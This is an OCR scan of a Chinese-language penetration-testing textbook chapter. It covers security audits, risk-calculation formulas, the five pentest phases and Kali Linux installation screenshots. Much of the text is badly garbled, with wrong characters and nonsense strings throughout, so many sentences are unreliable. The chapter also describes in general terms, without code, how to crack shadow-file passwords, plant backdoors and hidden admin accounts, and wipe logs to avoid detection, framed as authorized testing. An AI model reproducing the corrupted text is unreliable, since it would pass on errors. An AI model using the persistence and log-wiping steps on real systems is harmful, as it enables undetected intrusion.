许多 情况 中 ， 安 全 审计 会 市 给 客户 一 种 对 安全 的 误解 ， 即 安全 取决 于 审计 的 标准 或 基线 。 
许多 标准 和 基线 的 更 新 过 程 都 会 很 漫长 ， 以 至 于 无 法 跟 上 今天 网 络 世 界 中 发 现 各 种 威胁 
的 速度 。 我 们 建议 你 提供 的 安全 服务 要 超过 标准 或 基线 要 求 的 内 容 ， 以 将 目标 的 安全 等 
级 提高 到 一 个 能 防范 现实 中 威胁 的 可 接受 水 平 。 服 务 还 应 该 包括 跟 进 客户 、 辅 助 他 们 落 
实 补救 措施 ， 以 将 他 们 的 安全 水 平 提 高 到 行业 标准 或 基线 之 上 。 


O 漏洞 评估 。 在 这 个 过 程 中 ， 专 业 安全 人 员 会 扫描 网 络 设备 、 操 作 系 统 和 应 用 软件 ， 以 便 
找 出 已 知 或 未 知 的 漏洞 。 漏 洞 可 能 是 空 月 、 错 误 或 薄弱 环节 ， 具 体 取决 于 系统 是 如 何 设 
计 、 使 用 和 保护 的 。 如 果 漏 洞 被 利用 了 ， 可 能 会 导致 非 授 权 访 问 、 权 限 提 升 、 对 目标 系 
统 的 拒绝 服务 攻击 ， 或 者 其 他 后 琳 。 


漏洞 评 佑 通 帝 会 在 发 现 漏洞 后 立即 保 止 ,也 就 是 说 渗透 测试 人 员 不 会 对 其 执行 攻击 以 验 
证 它 是 否 真 实 存在 。 漏洞 评 佑 交付 的 结果 包括 跟 找到 的 所 有 漏洞 相关 的 浴 在 风险 以 及 可 
能 的 补救 步 又 。 有 很 多 解决 方案 ， 如 Kali Linux。 它 可 用 来 基于 系统 /服务 需 的 类 型 TR 
作 系 统 、 开 放 的 通信 关口 和 其 他 方法 扫描 漏洞 。 漏 洞 评 佑 可 能 是 日 盒 、 灰 盒 或 黑 盒 ， 具 
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体 取决 于 任务 的 特性 。 


漏洞 扫 描 仅 在 计算 风险 时 有 用 。 许 多 安全 审计 的 缺点 在 于 漏洞 扫描 的 结 末 会 让 安全 审计 
的 任务 加 重 许多 , 却 没 有 提供 任何 实际 价值 。 许 多 漏洞 扫描 融 会 报 出 假 阳 性 的 漏洞 ， 或 是 
找 出 并 不 存在 的 独 洞 。 出 错 的 原因 是 它们 未 能 正确 识别 操作 系统 , 或 是 只 能 识别 修复 漏洞 
的 特定 补丁 而 不 能 识别 累计 补丁 ( 聚合 多 个 小 补丁 的 大 型 补丁 ) 或 是 软件 的 修复 版 本 。 将 
风险 和 汤 洞 对 应 起 来 可 以 为 系统 的 易 攻 击 性 提供 一 个 真实 的 定义 和 判断 。 许多 情况 中 , 这 
意味 着 日 动工 具 生 成 的 漏洞 报告 害 要 人 工 检 查 一 下 再 提交 。 


客户 还 会 想 知道 跟 漏洞 关联 的 风险 以 及 降低 发 现 的 风险 的 预期 成 本 .要 想 提供 具体 的 成 本 
值 ， 理 解 如 何 计算 风险 很 重要 。 


风险 计算 

理解 如 何 计算 跟 找 到 的 漏洞 相关 联 的 风险 很 重要 , 这 样 才 能 做 出 具体 如 何 处 理 的 决策 。 多数 
客户 在 决定 风险 的 影响 时 都 会 参考 CISSP 的 CIA 三 角 。CIA 分 别 指 特定 系统 或 应 用 的 机 密 性 
( Confidentiality )、 完 整 性 (Integrity ) 和 可 用 性 (Availability )。 在 推算 风险 的 有 影 啊 时 ， 客 户 必 须 
将 每 个 模块 和 漏洞 整体 独立 评 舍 ， 以 此 获得 对 该 风险 的 真实 认识 ， 并 推算 可 能 造成 的 影响 。 


找到 漏洞 的 风险 是 否 可 接受 , 或 者 把 风险 降 到 可 接受 的 水 平 是 否 会 超出 控制 成 本 , 应 该 由 客 
户 来 决定 。 客 户 不 会 花 一 百 万 美元 来 修复 访客 打印 机 上 的 一 个 安全 风险 ; 不 过 , ei ER Rd 
入 两 们 的 资金 来 你 护 存 有 公司 机 密 数 据 的 系统 。 


注册 信息 系统 安全 师 (CISSP, Certified Information Systems Security Professional ) WFF 3I] 
出 了 用 来 计算 风险 的 公式 ， 如 下 所 示 。 


单一 威胁 预期 损失 (SLE, Single Loss Expectancy ) 是 资产 价值 ( AV, Asset Value ) 单 次 损 
失 的 成 本 。 单 一 威胁 造成 损失 的 百分比 ( EF, Exposure Factor ) 是 指 资产 损失 对 整个 组 织 的 影 啊 ， 
比如 因 连 接 互 联网 的 服务 硕 当 机 而 对 营 收 造成 的 影响 。 客户 在 计算 安全 投入 时 应 该 计算 单个 资产 
的 SLE 来 帮助 确认 应 该 投入 的 资金 水 平 。 如 果 一 个 SLE 会 给 公司 种 来 一 百 万 美元 的 损失 ， 在 预算 
中 考虑 预 留 资金 修复 这 个 漏洞 束 合 情 合 理 。 


单一 威胁 预期 损失 计算 公 邢 : 


SLE = AV * EF 


下 一 个 重要 的 公式 是 指出 SLE 多 长 时 间 会 发 生 一 次 。 如 果 一 个 价值 一 百 万 美元 的 SLE 一 特 万 
年 才 会 发 生 一 次 ， 比 如 流星 从 天 空 哈 洛 ， 那 就 没 必要 投资 数 百 万 在 总 部 外 面 建 一 个 写 型 保护 体 。 
相反 ,如 末 一 场 火灾 可 能 会 造成 相当 于 一 百 万 美元 的 损失 ,而 且 可 能 每 几 年 就 会 发 生 一 次 , 那么 
投资 防火 系统 就 是 明 管 之 举 。 茶 个 资产 损失 发 生 的 频 度 我 们 称 为 单一 威胁 年 发 生 率 ( ARO, Annual 
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Rate of Occurrence )。 


单一 威胁 年 预期 损失 (ALE, Annualized Loss Expectancy ) 表示 的 是 因 风 险 造 成 的 年 度 预期 
损失 。 举 个 例子 ， 流 星 险 沙 的 年 预期 损失 非常 低 〈 一 百年 才 一 次 )， 而 火灾 发 生 的 概率 更 大 ， 那 
么 就 应 该 在 未 来 的 投资 中 将 后 者 计算 出 来 用 作 保 护 建筑 物 。 


单一 威胁 年 预期 损失 计算 公 陈 : 


ALE = SLE * ARO 


最 后 , FeV ERA GE SSH XU, 用 以 算出 用 来 控制 的 投资 也 同样 重要 。 它 可 以 决定 客 
户 是 否 应 该 投资 修复 某 项 资产 中 的 汤 洞 进行 投资 ， 以 及 该 投资 多 少 。 


风险 计算 公式 : 


风险 = 资产 价值 x 威胁 x 涯 洞 x 影响 


客户 通 第 部 没有 风险 管理 计算 公式 中 各 个 变量 的 值 ,这 些 计算 公式 可 以 当做 指引 系统 来 玫 客 
户 更 好 地 理解 他 们 该 如 何 对 安全 进行 投资 。 在 前 面 的 例子 中 , 我 把 对 流星 十 和 建筑 物 中 火灾 的 舍 
计 值 代入 了 计算 公式 , 应 该 能 用 售 计 的 美元 值 解释 为 什么 投资 防火 系统 要 比 投资 金属 写 型 保护 体 
来 防止 坠落 物 更 好 。 


渗透 测试 是 用 类 似 于 真实 恶意 攻击 者 采用 的 手法 来 攻击 系统 源 洞 的 方法 ,一般 来 说 , TET 
系统 或 网 络 上 花 光 了 用 于 加 同安 全 的 投资 后 , 客户 一 般 就 会 诉求 于 渗透 测试 ,以 验证 各 方面 的 安 
全 投资 。 渗 透 测 试 可 以 是 黑 盒 、 晶 盒 或 是 灰 盒 ， 具 体 取决 于 双方 达成 的 工作 范围 。 


渗透 测试 和 漏洞 评 佑 的 最 主要 区 别 在 于 渗透 测试 针对 的 是 发 现 的 漏洞 , 它 会 验证 跟 目标 相关 
联 的 已 知 风险 是 否 真 的 降低 了 。 一 旦 资产 所 有 者 授权 服务 提供 商 针 对 目标 上 发 现 的 漏洞 实施 攻 
击 ， 对 目标 的 漏洞 评估 也 就 成 了 渗透 测试 。 通 第 ,渗透 测试 服务 的 成 本 会 高 一 些 ， 因 为 这 类 服务 
需要 更 昂贵 的 资源 、 工 具 和 时 间 来 完成 任务 。 一 个 贡 见 的 误区 是 认为 渗透 测试 服务 能 够 加 强 IT 安 
全 ， 因 为 这 类 服务 的 关联 成 本 相 比 其 他 类 型 的 安全 服务 更 高。 具体 说 明 如 下 。 


a 渗透 测试 无 法 让 IT 网 络 更 安全 ， 因 为 渗透 服务 测试 的 是 现 有 的 安全 部 署 ! 如 果 客 户 认 为 
目标 还 不 够 安全 ， 那 就 不 应 考虑 渗透 测试 。 

口 渗透 测试 会 给 系统 市 来 负面 影响 : 在 对 第 三 方 持 有 的 资产 进行 渗透 测试 前 ， 你 需要 从 有 
效 的 授权 机 构 那 里 拿 到 书面 授权 才 行 。 没 有 有 效 授权 的 渗透 测试 会 被 授权 机 构 看 成 非法 
攻击 。 授 权 文件 中 应 包含 谁 会 为 渗透 测试 中 造成 的 破坏 人 负责， 以 及 一 旦 系统 被 破坏 应 该 
联系 谁 来 避 倪 后 续 的 负面 效应 。 最 佳 实践 古 在 执行 预期 设 定 水 平 的 攻击 之 症 提 醒 客 户 跟 
各 个 危害 目标 的 方法 相关 联 的 所 有 浴 在 风险 。 这 也 是 我 们 推 存 进行 小 范围 有 针对 性 的 渗 
透 测 试 的 原因 之 一 。 这 方面 很 容易 做 到 更 有 条 理 。 作 为 常见 的 最 佳 实践 ， 我 们 会 收 到 确 
认 信息 一 一 在 最 坏 的 情况 下 ， 客 户 可 以 使 用 备份 或 其 他 灾难 恢复 方法 重 置 系统 。 
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渗透 测试 预期 的 交付 结果 也 应 该 在 议定 工作 范围 时 明确 指出 。 黑 盒 方法 中 获取 跟 目 标 有 关 的 
于 县 最 稼 见 的 途径 是 通过 社会 工程 , 也 就 是 通过 攻击 人 群 而 不 是 系统 。 比 如 匈 面 试 一 个 企业 内 部 
的 职位 ,那么 一 周 后 就 能 坚 无 阻挡 地 市 出 这 些 机 黎 数 据 。 如 采 客 户 想 知道 的 是 他 们 的 Web 应 用 在 
遭受 远程 攻击 时 的 易 攻 击 性 怎样 , 那么 他 们 可 能 不 会 认可 这 类 交付 的 内 容 。 确 立 一 个 明确 的 结尾 
日 标 也 很 重要 ,这样 所 有 利益 方 都 能 理解 什么 时 候 可 以 认为 渗透 测试 服务 已 经 结束 。 通常 ,议定 
的 交付 内 容 会 起 到 这 个 作用 。 


对 服务 提供 商 来 说 ， 任 务 的 成 功 取决 于 交付 渗透 测试 任务 所 耗费 的 时 间 和 服务 的 鱼 利 能 
如 果 过 程 能 够 更 高 效 和 精准 ， 也 就 意味 着 用 更 少 的 服务 获得 更 好 的 结 采 。 交 付 内 容 的 质量 越 高 ， 
服务 就 越 贴近 客户 的 期 望 ， 这 样 才 能 左 得 更 好 的 声誉 ,在 未 来 才能 发 展 更 多 的 业务 。 出 于 这 些 原 
因 ， 确 立 执行 渗透 测试 服务 的 有 效 方法 并 确认 如 何 报告 发 现 的 绪 采 也 很 重要 。 


1.3 Kali 渗透 测试 基础 


Kali Linux 是 参照 渗透 测试 的 服务 流程 而 设计 的 。 不 管 出 发 点 是 日 盒 测 试 、 黑 盒 测 试 还 是 灰 
盒 测 试 ， 我 们 在 用 Kali 或 其 他 工具 对 日 标 进 行 渗透 测试 时 都 应 加 人 循 一 定 的 步 又 。 


1.3.1 第 一 步 : 侦察 


在 发 起 攻击 之 前 , 应 该 了 解 尽 可 能 多 跟 目标 的 环境 和 系统 特征 有 关 的 信息 。 你 擎 握 的 能 够 辩 
识 目 标的 信息 越 多 , 就 越 有 可 能 找到 最 简便 最 快捷 完成 任务 的 方式 。 相 比 日 盒 测试 ， 淋 盒 测试 通 
利 需 要 更 多 的 侦察 ,因为 它们 没有 提供 有 关 目 标的 数据 。 侦 察 服 务 包 括 研 究 目标 在 互联 网 上 的 踪 
迹 ， 监 测 资源 、 人 和 过 程 ， 扫 描 网 络 信息 如 IP 地 址 和 系统 类 型 ， 对 公共 服务 如 服务 支援 中 心 和 其 
他 途径 进行 社会 工程 。 


侦 祭 是 渗透 测试 服务 的 第 一 步 ， 不 管 你 是 要 验证 已 知 信息 还 是 要 搜集 新 的 有 天目 标的 情报 。 
侦察 通 币 都 是 从 基于 工作 范 于 定义 目标 环境 开始 。 一 旦 确认 目标 ,就 需要 研究 如 何 收集 有 关 目 标 
的 情报 ， 比 如 开放 哪些 端口 用 来 通信 、 它 托管 在 哪里 、 提 供给 客户 的 服务 类 型 等 。 这 些 数 据 有 助 
于 确立 一 个 采用 最 简单 方法 取得 期 望 结 果 的 行动 方案 。 侦察 任务 的 交付 内 容 应 该 包括 需要 攻击 的 
所 有 目标 资产 清单 、 跟 那些 禹 产 关联 的 应 用 、 使 用 的 服务 以 及 可 能 的 资产 所 有 者 。 


Kali Linux 提 供 了 一 个 名 为 “Information Gathering” 的 类 别 作 为 侦察 工作 的 资源 。 其 中 包 
含 的 工具 可 用 来 研究 网 络 、 数 据 中 心 、 无 线 环 境 和 主机 系统 。 


下 面 列 出 的 是 侦察 任务 的 目标 : 


a 找 出 目标 ; 
O 定义 应 用 和 商业 用 途 ; 
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O 找 出 系统 类 型 ; 

a 找 出 可 用 端口 ; 

O 找 出 运行 的 服务 ; 

O 对 信息 进行 社会 工程 ; 
口 记录 发 现 的 内 容 。 


1.3.2 第 二 步 : 目标 测试 


找 出 目标 并 且 在 侦察 阶段 对 其 做 了 研究 后 ,下 一 步 就 是 对 目标 进行 漏洞 测试 。 这 时 ,渗透 测 
试 人 员 应 该 已 经 具备 足够 的 有 关 卓 标的 信息 来 选择 如 何 分 析 浴 在 的 着 洞 或 薄弱 环 市 。 比 如 要 针对 
王 弱 环节 进行 测试 ， 你 需要 了 解 Web 应 用 的 运作 方式 、 被 识别 的 服务 、 通 信 的 端口 和 其 他 信息 。 
漏洞 评估 和 安全 审计 通 凋 都 会 在 对 目标 进行 测试 的 这 个 环节 后 绪 


通过 侦察 拿 到 细节 信息 有 助 于 提高 锁定 淤 在 漏洞 的 精确 度 、 缩 短 执行 目标 测试 服务 的 执行 时 
间 ， 并 有 助 于 绕 过 现 有 的 安全 部 普 。 举 个 例子 ， 针 对 Web 应 用 服务 带 运 行 通用 漏洞 扫描 融 很 可 能 
会 引起 资产 所 有 者 的 注意 , 运行 过 程 还 要 人 花费 一 些 时 间 , 并 且 只 能 生成 一 些 有 关系 统 和 应 用 的 篆 
见 信息 。 基 于 侦察 阶段 收集 到 的 数据 针对 茶 个 特定 漏洞 对 服务 天 进行 扫 措 , 欣 产 所 有 者 可 能 更 难 
发 现 ， 从 而 提供 了 不 错 的 可 利用 浴 在 源 洞 ， 细 短 了 执行 时 间 。 


针对 漏洞 进行 的 目标 测试 可 以 是 手动 的 ， 也 可 以 通过 工具 做 到 目 动 化 。 在 Kali Linux 中 有 一 
系列 工具 聚合 到 了 一 个 名 为 Vulnerability Analysis 的 类 别 下 面 。 这 些 工 具 才 盖 的 范围 从 访问 网 络 
设备 到 访问 数据 库 都 有 。 

下 面 列 出 的 是 目标 测试 的 目标 : 

口 测试 出 目标 的 溥 弱 环节 

口 找 出 易 受 攻击 的 系统 ， 并 确定 其 优先 级 ; 

Q 将 易 受 攻击 系统 和 资产 所 有 者 进行 映射 ; 

Q 记录 发 现 的 内 容 。 


1.3.3 ”第 三 步 : 漏洞 利用 


这 一 步 会 利用 找到 的 漏洞 来 验证 漏洞 是 否 真 实 存 在 ,并 会 验证 能 获得 什么 样 的 信息 或 是 什么 
样 的 访问 权限 。 漏洞 利用 是 渗透 测试 服务 和 其 他 被 动 服务 如 奖 洞 评 信 和 安全 审计 的 主要 区 别 。 如 
琳 没 有 获得 目标 的 资产 所 有 者 授权 ， 澳 洞 利用 和 后 续 步 又 都 会 市 来 法 律 后 末 。 

这 一 步 成 功 与 否 完全 依赖 于 前 面 几 步 的 投入 。 许 多 洗 洞 利用 技术 都 是 针对 特定 漏洞 开发 的 。 
如 打 疫 有 正确 执行 , 可 能 会 造成 意外 的 后 条 。 最 佳 实践 是 找 出 右 干 漏洞 之 后 ,基于 最 容 多 攻击 的 
着 洞 制定 一 个 攻击 素 略 。 


漏洞 利用 可 以 是 手动 的 ， 也 可 以 是 目 动 的 , 这 要 根据 最 终 对 和 象 来 确定 。 比 如 ， 目 动 运 行 SQL 
注入 来 获取 某 个 Web 应 用 的 管理 员 访 问 权 限 , 或 是 通过 对 服务 支援 中 心 工作 人 员 进 行人 工 的 社会 
工程 获取 管理 员 的 登录 凭据 。 Kali Linux 提 供 了 一 个 名 为 Exploitation Tools 的 专门 工具 来 进行 目标 
漏洞 利用 ， 从 对 特定 服务 进行 利用 的 工具 到 社会 工程 工具 包 ， 应 有 尽 有 。 


下 面 列 出 的 是 漏洞 利用 的 目标 : 


口 漏洞 利用 ; 

O 拿 到 权限 ; 

口 抓 取 非 授 权 数 据 ; 

O 积极 地 进行 社会 工程 ; 
口 攻击 其 他 系统 或 应 用 ; 
a 记录 发 现 的 信息 。 


1.3.4 EWE: 提升 权限 


获得 目标 的 访问 权限 并 不 保证 就 能 完成 渗透 测试 任务 的 目标 。 许 多 情况 下 , 利用 有 漏洞 的 系 
统 只 能 拿 到 访问 目标 数据 和 资源 的 有 限 权 限 。 攻击 者 必须 提升 权限 才能 抓 取 重要 内 容 。 这 些 内 容 
可 以 是 敏感 数据 、 关 键 的 基础 设施 等 。 


提升 权限 包括 找 出 和 破解 密码 、 用 户 账 户 和 非 授 权 的 IT 空间 。 举 个 例子 : 拿 到 受 限 的 用 户 访 
问 权限 后 ,， 找 出 包含 管理 员 登 录 和 凭据 的 shadow 文 件 , 通过 密码 破解 获得 管理 员 密 码 , 然后 用 省 理 
员 权 限 访 问 内 部 应 用 系统 。 


Kali Linux 包 含 了 很 多 用 来 提升 权限 的 工具 ， 分布 在 Password Attacks 和 Exploitation Toolsix 
两 个 类 别 中 。 由 于 这 些 工具 中 的 大 多 数 都 市 有 获得 初始 访问 权限 和 提升 权限 的 方法 , 它们 是 按 工 
具 集 来 进行 聚合 的 。 

下 面 列 出 的 是 提升 权限 的 目标 : 

D 获得 更 高 级 别 的 访问 系统 和 网 络 的 权限 ; 

口 获取 其 他 用 户 的 账户 信息 ; 

口 使 用 提升 过 的 权限 来 访问 其 他 系统 ; 

口 记录 发 现 的 信息 。 


1.3.5 BAB: 保持 访问 


最 后 一 步 是 通过 建立 其 他 到 系统 的 入 口 来 保持 访问 。 可 能 的 话 , 将 渗透 留 下 的 痕迹 也 一 并 隐 
蕊 -渗透 测试 工作 很 有 可 能 触发 防御 功能 , 最 终 导 致 渗透 测试 人 员 获 取 的 访问 网 络 的 途径 被 加 固 。 
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最 佳 实践 是 建立 其 他 途径 来 访问 目标 系统 ， 以 防 主要 路 径 被 关闭 。 替 代 性 的 访问 方法 有 后 门 、 新 UN 
建 管理 员 账 户 、 加 密 过 的 隧道 和 新 的 网 络 访问 通道 。 


要 保持 在 目标 系统 中 的 访问 , 吃 一 个 重要 的 方面 是 删除 渗透 证 据 。 这 会 使 得 检测 攻击 更 加 
难 ， 从 而 降低 来 自 安 全 防范 团队 的 回应 度 。 这 部 分 工作 包括 探 除 用 户 日 志 、 掩 盖 现 有 的 访问 通过 
和 删除 早 改 的 猴 迹 〈 如 在 进行 渗透 测试 时 留 下 的 错误 消息 )。 


Kali Linux 提 供 了 一 个 名 为 Maintaining Access 的 类 别 ， 主 要 用 来 保持 对 目标 的 访问 。 其 中 很 
多 工具 都 用 于 建立 到 目标 的 各 种 形式 的 后 门 。 


P 面 是 保持 访问 的 目标 : 


O 建立 到 目标 网 络 的 多 种 访问 方法 ; 

口 删除 未 授权 访问 的 证 据 ; 

口 修复 在 漏洞 利用 中 受 影响 的 系统 ; 

OQ 如 有 必要 ， 注 入 假 数 据 ; 

O 通过 加 密 或 其 他 方式 隐藏 通信 方式 ; 
口 记录 发 现 的 信息 。 


1.4 Kali Linux 简介 


BackTrack 的 作者 发 布 了 一 个 全 新 的 高 级 渗透 测试 Linux 发 行 版 , 名 为 Kali Linux. BackTrack 5 
将 会 是 BackTrack 发 行 版 的 最 后 一 个 主 版 本 。 为 了 跟 上 网 络 安全 的 挑战 和 现代 测试 的 需要 ， 
BackTrack 的 作者 决定 创建 一 个 新 的 平台 ， 于 是 ，Kali Linux 于 2013 年 3 月 13 日 诞生 并 发 布 。Kali 
Linux 基 于 Debian， 其 文件 系统 还 循 FHS 标 准 。 


相 比 BackTrack，Kali 有 很 多 优势 。 它 比 BackTrack 多 了 许多 自 带 的 更 新 版 本 的 工具 。 这 些 工 
具 都 来 自 于 Debian 的 软件 包 仓 库 ， 而且 每 天 都 会 同步 四 次 。 也 就 是 说 ， 用 户 拿 到 的 是 最 新 的 软件 
包 更 新 和 安全 修复 版 本 。 新 的 遵循 FHS 标 准 的 文件 系统 使 得 大 多 数 工 具 都 能 从 文件 系统 中 的 任意 
位 置 开 始 运 行 。Kali 还 文 持 定制 、 无 人 值守 安装 、 可 自由 选择 桌面 环境 ， 以 及 其 他 一 些 自 带 的 优 
秀 功能 。 


Kali Linux 可 以 从 http:/www.kali.org/ 下 载 并 安装 。 
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Kali Linux 可 以 通过 多 种 途径 下 载 ， 最 常见 的 就 是 下 载 I SO 映像 文件 。ISO 映 像 文 件 分 为 32 位 
和 64 位 两 种 。 


如 果 你 计划 在 虚拟 机 中 (如 VMware ) 使 用 Kali Linux， 那 么 有 预 构建 好 的 VM 映 像 文件 。 直 
接 下 载 VM 映 像 文件 的 好 处 在 于 它 已 经 预 载 了 『 了 VMware 工具 。VM 映 像 文 件 是 带 有 物理 地 址 扩展 
(PAE, Physical Address Extension ) 文 持 的 32 位 映像 文件 。 理 论 上 说 ， 相 比 传统 的 32 位 操作 系统 ， 
PAE 内 核 允 许 系 统 访问 更 多 的 系统 内 存 。 虽然 操 作 系 统 界 有 一 些 具备 一 定 影响 力 的 人 物 尚 在 争论 
PAE 内 核 是 否 真 的 有 用 ,但 如 果 你 计划 在 虚拟 机 环境 中 使 用 Kali Linux， 本 书 作 者 推荐 使 用 VM 映 
像 文件 。 


1.5.1 ”从 外 部 存储 媒体 上 运行 Kali Linux 


Kali Linux 可 以 从 外 部 存储 媒体 源 (如 U 盘 或 DVD ) 上 运行 ， 而 不 必 安 装 到 主机 的 硬盘 上 。 
这 种 方式 很 容易 使 用 ， 不 过 它 的 性 能 和 可 操作 性 都 会 受 限 。Kali Linux 必 须 从 远程 源 上 加 载 程序 ， 
这 可 能 会 影响 性 能 , 还 有 可 能 一 些 应 用 或 硬件 设置 不 能 正常 工作 。 使 用 只 读 存 储 媒 体 不 允许 保存 
经 过 定制 的 设置 ， 而 这 些 设置 可 能 是 让 Kali Linux 正 常 运行 所 必需 的 。 我 们 强烈 推荐 将 Kali Linux 
安装 到 主机 硬盘。 


1.5.2 ”安装 Kali Linux 


在 计算 机 上 安装 Kali Linux 非 常人 简单 ， 跟 安装 其 他 操作 系统 差不多 。 自 和 完 ， 你 需要 若 容 的 计 
算 机 便 件 。Kali 文 持 1386、amd64 和 ARM (armel 和 armhf ) 平台。 便 件 要 求 会 在 下 面 的 清单 中 列 出 ， 
不 过 我 们 建议 使 用 至 少 三 倍 于 最 低 要 求 的 人 硬件 平台 。 总 的 来 说 ,如 果 有 更 多 的 可 用 内 存 并 安装 在 
较 新 的 机 器 上 ，Kali Linux 会 运行 得 更 好 。 下 载 Kali Linux， 然 后 将 ISO 文 件 烧 录 到 DVD 上 ,或 是 
准备 一 个 装 有 Kali Linux Live 的 U 盘 作为 安装 媒体 。 如 果 你 的 计算 机 上 没有 DVD 光驱 或 是 USB 端 
口 ， 可 以 参考 Kali Linux 的 网 络 安装 。 


下 面 列 出 的 是 最 低 安 站 需 求 。 


a ZEKali Linux 需 要 最 少 8 GB 的 便 盘 空间 。 

O 对 于 i386 和 amd64 架 构 ， 最 少 要 有 512 MB 内 存 。 

口 CD-DVD92CGJR/USB/n BI KFF 

O 在 安装 前 你 还 要 有 可 用 的 互联 网 连接 。 这 很 重要 ， 否 则 在 安装 时 你 无 法 配置 和 访问 软件 
包 仓 库 。 


(1) 在 运行 Kali 后 ， 它 会 显示 一 个 局 动 安 痛 界 面 。 你 可 以 选择 要 进行 哪 种 类 型 的 安 痛 〈 基于 
GUI 的 还 是 基于 文本 的 )。 
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EUN UC 


Boot menu 


Live Camd64) 
Live Camd64 failsafe) 


Text-mode install 


(2) 选择 本 地 语言 设置 ， 国 际 和 键盘 设置 。 


‘KALI LINUX 


Select a language 


Choose the language to be used for the installation process. The selected language will also be the 
default language for the installed system. 


Language: 


Chinese (Simplified) 中 文 (简体 ) 
Chinese (Traditional) Fp ($298) 
Croatian Hrvatski 
Czech Cestina 
Danish Dansk 
Dutch Nederlands 
Dzongkha Er 


English English 
Esperanto - Esperanto 

Estonian - Eesti 

Finnish Suomi 

French Francais 

Galician Galego 

Georgian JoOmgmo 

German Deutsch 


m 
raak EA Nnu ce alll 


Screenshot 


Go Back Continue 


(3) 给 Kali Linux $ALH—PF EDLY. BOA ELS Kali. 


` 
x 
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` KALI LINUX 


Configure the network 


Please enter the hostname for this system. 


The hostname is a single word that identifies your system to the network. If you don't know what your 
hostname should be, consult your network administrator. If you are setting up your own home network, 
you can make something up here. 


Hostname: 


w o E 


| Screenshot | Go Back | Continue 


(4) RER. MERRET, LBP ER — XE ARIE 


`- KALI LINUX 


Set up users and passwords 


You need to set a password for 'root', the system administrative account. A malicious or unqualified user 
with root access can have disastrous results, so you should take care to choose a root password that is 
not easy to guess. It should not be a word found in dictionaries, or a word that could be easily 
associated with you. 


A good password will contain a mixture of letters, numbers and punctuation and should be changed at 
regular intervals. 


The root user should not have an empty password. If you leave this empty, the root account will be 
disabled and the system's initial user account will be given the power to become root using the "sudo" 
command. 


Note that you will not be able to see the password as you type it. 
Root password: 


EE 


Please enter the same root password again to verify that you have typed it correctly. 
Re-enter password to verify: 


Screenshot Go Back | Contjnue | 


(5 下 一 个 弹出 的 界面 会 问 你 时 区 设置 。 进 行 相应 的 修改 ， 然 后 选择 Continue。 下 面 的 堆 图 
中 显示 的 是 选择 了 Eastern 标 准时 间 的 界面 。 
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‘KALI LINUX 


Configure the clock 


If the desired time zone is not listed, then please go back to the step "Choose language" and select a 
country that uses the desired time zone (the country where you live or are located). 
Select your time zone: 


Central 


Mountain 
Pacific 
Alaska 
Hawaii 
Arizona 
East Indiana 


Samoa 


| Screenshot 


Go Back | AContinue | 


安装 程序 会 让 你 设置 分 多。 如果 你 是 将 Kali 安 装 到 虚拟 映像 上 ， 选 择 Guided Install - Whole 
Disk。 它 会 销毁 人 硬盘 上 的 所 有 数据 ， 并 安装 Kali Linux。 注 意 ， 在 虚拟 机 上 ， 只 有 虚拟 人 硬盘 会 被 
擦 除 。 局 级 用 户 可 以 选择 手工 配置 来 定制 各 个 分 区 。Kali 还 提供 了 选项 来 使 用 逻辑 卷 管理 器 
(LVM, Logical Volume Manager )。LVM 文 持 在 安 痛 完成 后 管理 分 区 和 调整 分 区 大 小 。 理 论 上 ， 


它 应 该 做 到 存储 需要 变更 时 可 以 方便 地 人 和 修改。 不 过 ， 除 非 你 对 Kali Linux 的 需求 非 党 复杂， 否则 
可 能 用 不 到 它 。 


、 KALI LINUX 


Partition disks 


The installer can guide you through partitioning a disk (using different standard schemes) or, if you 


prefer, you can do it manually. With guided partitioning you will still have a chance later to review and 
customise the results. 


If you choose guided partitioning for an entire disk, you will next be asked which disk should be used. 
Partitioning method: 


Guided - use entire disk 
Guided - use entire disk and set up LVM 


Guided - use entire disk and set up encrypted LVM 
Manual 


Screenshot 


Go Back | Continue | 
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(6) 最 后 一 个 窗口 会 回顾 配置 过 的 安 猴 设 定 。 如 打 一 切 看 上 去 没 问 题 ， 选择 Yes 来 继续 完成 这 
个 过 程 ， 如 下 面 的 截图 所 示 。 


`- KALI LINUX 


Partition disks 


If you continue, the changes listed below will be written to the disks. Otherwise, you will be able to make 
further changes manually. 


WARNING: This will destroy all data on any partitions you have removed as well as on the partitions that 
are going to be formatted. 


The partition tables of the following devices are changed: 
SCSI3 (0,0,0) (sda) 


The following partitions are going to be formatted: 
partition #1 of SCSI3 (0,0,0) (sda) as ext4 
partition #5 of SCSI3 (0,0,0) (sda) as swap 


Write the changes to disks? 


Screenshot | 


| Continue | 


(7) Kali Linux 使 用 集中 式 软件 仓库 来 分 发 应 用 软件 包 。 如 采 想 要 安 次 这些 包 ， 你 需要 使 用 网 


络 镜像 。 这 些 软件 包 会 通过 HTTP 协 议 下 载 。 如 末 网 络 使 用 了 代理 服务 硕 ， 你 还 需要 在 代理 设置 
中 配置 网 络 代理 。 


`- KALI LINUX 


Configure the package manager 


A network mirror can be used to supplement the software that is included on the CD-ROM. This may also 
make newer versions of software available. 


Use a network mirror? 


Screenshot 


i Go Back s) [ Continue | 
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(3)Kali 会 弹出 提醒 ， 要 你 确认 安装 GRUB。GRUB 是 一 个 多 启动 引导 加 载 程序 。 它 支持 启动 
多 个 操作 系统 。 几 乎 任何 情况 下 都 应 该 选择 安装 GRUB。 如 果 想 把 系统 配置 成 双 启 动 ， 你 需要 确 


定 GRUB 能 够 识别 其 他 操作 系统 ， 这 样 它 能 给 用 户 提 供 局 动 其 他 操作 系统 的 选项 。 如 采 没 有 检测 
到 任何 其 他 操作 系统 ， 它 会 在 局 动 时 目 动 进 入 Kali Linux. 


、 KALI LINUX 


Install the GRUB boot loader on a hard disk 


It seems that this new installation is the only operating system on this computer. If so, it should be safe 
to install the GRUB boot loader to the master boot record of your first hard drive. 


Warning: If the installer failed to detect another operating system that is present on your computer, 
modifying the master boot record will make that operating system temporarily unbootable, though GRUB 
can be manually configured later to boot it. 

Install the GRUB boot loader to the master boot record? 


k 
Screenshot 


g Go Back | Continue | 


(9) 28 £1 你 已 经 安装 好 Kali Linux 了 。 现 在 你 需要 移 除 所 有 的 外 部 存储 媒体 ( 物理 的 或 虚拟 
HJ), Sea vest Continuek Ha AZ 


‘KALE LINUX 


Finish the installation 


Installation complete 
Installation is complete, so it is time to boot into your new system. Make sure to remove the 


installation media (CD-ROM, floppies), so that you boot into the new system rather than 
restarting the installation. 


Screenshot 


| Go Back Continue | 
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1.5.3 ”首次 运行 Kali Linux 和 VM 了 映像 文件 


